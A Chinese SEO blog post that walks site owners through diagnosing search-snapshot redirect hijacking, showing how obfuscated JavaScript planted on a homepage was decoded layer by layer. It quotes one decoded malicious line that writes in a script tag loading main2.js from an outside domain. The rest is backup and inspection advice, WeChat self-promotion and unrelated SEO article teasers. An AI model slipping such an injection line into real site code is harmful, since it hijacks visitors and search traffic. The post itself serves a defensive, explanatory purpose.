网站JS快照被劫持恢复诊断教程

张俊SEM seo优化评论0字数 848阅读2分49秒阅读模式

站长们经常遇到js快照劫持的问题,对网站的优化带来及大的影响。对于大多数新手站长来说js快照劫持,束手无策。今天无忧老师为大家进行一轮深度的解析。

一,js快照劫持示例

js快照劫持演示图,记录了是网站跳转的。

一个是百度搜索快照劫持演示。另一个是搜狐搜索快照劫持演示。

JS快照劫持,百度搜索演示图
JS快照劫持,搜狐搜索演示图

 

二,分析js快照劫持代码

经分析,网站首页被植入了恶意了代码,而且是多次加密JS代码。

此段代码就是添加在网站首页的JS,而且属于了加密了的代码,一般看不出什么猫腻。

三,加密JS层层分析

接下来进行JS反向解析分析。可以使用站长工具在线分析:http://tool.chinaz.com/js.aspx

站长工具JS混淆加密压缩 截图

解析后,可以看到真面目,这段代码。

< script type = "text/javascript" >
document.writeln("<script src=http://www.5121188.com/main2.js></script>"); < /script>

打开这个main2.js可以看到一段落代码。

JS恶意代码二次加密

攻击者真的多有精力,层层加密啊。怪不得一般站长根本无法发现。

然后再进行解密。

被加密的JS恶意代码解析图

这下大家应该清楚了,攻击者对代码进行了3次的加密再调用,来实现百度快照的JS劫持跳转。

 

四,网站安全建议

网站安全一直是一个让站长运营者头痛的问题,没有百分百安全的网站,只有一断的进行维护和优化,做到定期备份,定期检查,*大程度的杜绝网站被黑被劫持的风险。希望各位站长清楚并且牢记在心。

如果想要?我把整个JS快照劫持代码分析给大家,关注微信wuyouseo获取。

 

*后,在我的课程中也经常会分享一些网站安全小知识,请大家一定关注我的SEO博客www.ainiseo.com和微信公众号wuyousem,不断的分析干货教程和文章。

 

文章由 无忧老师分享,转载请注明出处。https://www.ainiseo.com/ 感谢你的阅读。

声明:转载此文是出于传递更多学习交流目的。若有来源标注错误或侵犯了您的合法权益,请作者持权属证明与本网联系,我们将及时更正、删除,谢谢。本站部分图文来源于网络,仅供学习交流,发表作品观点仅代表作者本人,本站仅提供信息存储空间服务,不承担连带责任。如有侵权,请及时联系管理员删除。

weinxin
添加微信
微信扫一扫
张俊SEM
  • 本文由 发表于 2023年9月1日 10:38:40
  • 转载请务必保留本文链接:https://www.zhangjunsem.com/25634.html
滨州seo优化推广(潍坊seo推广优化) seo优化

滨州seo优化推广(潍坊seo推广优化)

今天给各位分享滨州seo优化推广的知识,其中也会对潍坊seo推广优化进行解释,如果能碰巧解决你现在面临的问题,别忘了关注本站,现在开始吧! 滨州网站建设公司有哪些?哪些网站建设公司或者网站比较好? 滨...
公众号seo优化(seo自媒体) seo优化

公众号seo优化(seo自媒体)

今天给各位分享公众号seo优化的知识,其中也会对seo自媒体进行解释,如果能碰巧解决你现在面临的问题,别忘了关注本站,现在开始吧! 白杨SEO:谈谈微信公众号怎么运 微信公众号SEO搜索排名规则有哪些...